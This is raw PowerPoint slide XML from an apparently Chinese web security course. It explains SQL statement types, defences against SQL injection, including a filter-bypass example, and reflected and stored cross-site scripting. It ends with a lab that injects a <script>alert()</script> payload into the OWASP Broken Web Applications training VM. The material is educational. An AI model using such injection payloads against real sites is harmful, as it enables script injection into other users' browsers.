      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851F1501-6F21-9504-E57E-F35A560FDBE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1156311"/>
            <a:ext cx="3300904"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>封装客户端提交信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148308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数据定义语言</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7550" y="1700808"/>
            <a:ext cx="4824536" cy="2750240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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CREATE DATABASE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：创建数据库</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ALTER DATABASE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：修改数据库</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CREATE TABLE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：创建新表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ALTER TABLE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：变更数据库表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DROP TABLE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：删除表 </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CREATE INDEX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：创建索引</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DROP INDEX</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：删除索引</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数据操作语言</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5905" y="1700808"/>
            <a:ext cx="4824536" cy="1596078"/>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SELECT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：从数据库表中获取数据</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UPDATE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：更新数据库表中的数据</a:t>
            </a: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DELETE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：从数据库表中删除数据</a:t>
            </a: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INSERT INTO</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：向数据库表中插入数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3410482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3391"/>
            <a:ext cx="4355680"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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>替换或删除敏感字符</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字符串</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15934"/>
            <a:ext cx="4824536" cy="159601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是一种不完全的解决措施，例如，当客户端的输入为 “</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ccmdmcmdd</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时，在对敏感字符串“</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cmd</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替换删除以后，剩下的字符正好是“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cmd</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84731" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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445489" y="1713192"/>
            <a:ext cx="4824536" cy="351961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是目前最常被采用的方法，很多安全文档都认为</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攻击需要通过错误信息收集信息，有些甚至声称某些特殊的任务若缺乏详细的错误信息则不能完成，这使很多安全专家形成一种观念，即注入攻击在缺乏详细错误的情况下不能实施。而实际上，屏蔽错误信息是在服务端处理完毕之后进行补救，攻击其实已经发生，只是企图阻止攻击者知道攻击的结果而已。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851F1501-6F21-9504-E57E-F35A560FDBE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6445489" y="1155220"/>
            <a:ext cx="2377574"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>屏蔽出错信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4261964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02</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  跨站脚本攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442654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60121"/>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跨站脚本攻击</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4289059"/>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跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Cross Site Script, XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞是一种安全漏洞，攻击者可以利用这种漏洞在网站上注入恶意的客户端代码。 </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若受害者运行这些恶意代码，攻击者就可以突破网站的访问限制并冒充受害者。</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根据开放式</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应用安全项目（</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OWASP</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2017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年被认为</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7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种最常见的</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应用程序漏洞之一。 </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危害</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13192"/>
            <a:ext cx="4829607" cy="1211294"/>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攻击与</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注入攻击的区别：</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攻击主要影响的是客户端安全，而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注入攻击则主要影响</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服务器安全。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891564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80021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脚本</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06792"/>
            <a:ext cx="4824536" cy="236545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现在大多数网站都使用</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JavaScript</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执行</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计算，页面格式化，</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Cookie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管理等其他客户动作。</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这类脚本是在浏览网站的用户的计算机上运行的，而不是在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服务器自身中运行。</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61413"/>
            <a:ext cx="2256580"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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>示例</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25578"/>
            <a:ext cx="4824536" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en"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800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;head&gt;&lt;/head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en"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800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script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"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>write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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"A script was used to display this text"</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800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en"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800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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5BF95513-5293-4231-1331-92041F7A12BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="4677117"/>
            <a:ext cx="4744452" cy="1019469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2524277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1723549"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不易察觉性</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198079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浏览该网站的用户不会察觉到本地运行的脚本对网页的内容进行了转换。从浏览器呈现的视图来看，它看上去与静态</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HTML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页面没有任何的区别。只有当用户查看</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HTML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源代码时才可能看到</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JavaScript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普遍性</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21617" y="1725578"/>
            <a:ext cx="4824536" cy="2750176"/>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大多数浏览器都包含脚本支持，而且通常情况下是默认启用的。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应用程序开发人员已经变得习惯使用脚本使客户端功能自动化。需要指出的重要一点是，启用并使用脚本并不是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漏洞存在的原因，只有当</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应用程序开发人员犯错误时才会变得危险。</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3690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反射式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2365456"/>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根据其特征和利用手法的不同，主要分为反射式</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和存储式</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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>也称作非持久型、参数型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，主要用于将恶意脚本附加到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址的参数中。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2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19"/>
            <a:ext cx="166263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存储式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25578"/>
            <a:ext cx="4824536" cy="1211294"/>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存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>又称持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，比反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>更具有威胁性，并且可能影响到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器自身的安全。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891490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7108869" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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OWASP Broken Web Applications VM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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中</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选择</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反射式跨站脚本</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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0048AA"/>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36E45641-4516-2BF0-01FC-1FA9375894DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2198897"/>
            <a:ext cx="10297144" cy="4058173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D986E90-67C9-01BC-9F6E-83884428B35B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="5709180"/>
            <a:ext cx="1440160" cy="2400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反射式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925595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D6A0A5-CE50-0D0D-D5BF-F3FE85BAD866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2198897"/>
            <a:ext cx="10369152" cy="4038415"/>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7108869" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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OWASP Broken Web Applications VM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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中</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选择</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反射式跨站脚本</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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0048AA"/>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4D986E90-67C9-01BC-9F6E-83884428B35B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3719736" y="3856299"/>
            <a:ext cx="1368152" cy="29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反射式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40EC36FC-12D9-5991-61A3-2F01114AA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4223792" y="2325963"/>
            <a:ext cx="1368152" cy="29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9512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4037516" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;</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script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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');&lt;/script&gt;</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反射式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37AD77D5-85DA-AF9B-B667-63A4444EFA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
